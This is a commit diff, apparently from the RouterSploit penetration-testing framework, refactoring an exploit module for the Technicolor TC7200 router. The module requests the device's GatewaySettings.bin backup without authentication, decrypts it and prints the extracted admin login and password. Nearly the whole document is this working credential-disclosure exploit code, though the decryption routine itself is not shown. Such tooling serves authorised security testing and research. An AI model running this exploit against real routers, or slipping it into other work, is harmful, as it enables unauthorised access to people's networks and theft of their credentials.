TC7200 password disclosure v2 : minor refactor

02856b3f · Laurent Meirlaen · bad86479 · 02856b3f
Commit 02856b3f authored Dec 01, 2016 by Laurent Meirlaen
Show whitespace changes
Inline Side-by-side

Showing with 7 additions and 9 deletions

tc7200_password_disclosure_v2.py ...les/exploits/technicolor/tc7200_password_disclosure_v2.py +7 -9

No files found.
--- a/routersploit/modules/exploits/technicolor/tc7200_password_disclosure_v2.py
+++ b/routersploit/modules/exploits/technicolor/tc7200_password_disclosure_v2.py
@@ -38,25 +38,23 @@ class Exploit(exploits.Exploit):
    port = exploits.Option(80, 'Target Port')

    def run(self):
-        url = "{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port)
+        if self.check():
+            print_success("Target is vulnerable")

+            url = "{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port)
            response = http_request(method="GET", url=url)
-        if response is None:
-            return

-        if response.status_code == 200 and "MLog" in response.text:
+            if response is not None and response.status_code == 200 and "MLog" in response.text:
                print_status("Reading GatewaySettings.bin...")

                plain = self.decrypt_backup(response.text)
-            (name, pwd) = self.parseBackup(plain)
+                name, pwd = self.parse_backup(plain)

-            if len(name) or len(pwd):
                print_success('Exploit success! login: {}, password: {}'.format(name, pwd))
            else:
-                print_error('Exploit failed. Unable to decrypt config file.')
+                print_error("Exploit failed. Could not extract config file.")
        else:
-            print_error("Exploit failed. Device seems to be not vulnerable.")
-
+            print_error("Target is not vulnerable")
    @staticmethod
    def parse_backup(backup):
        p = backup.find('MLog')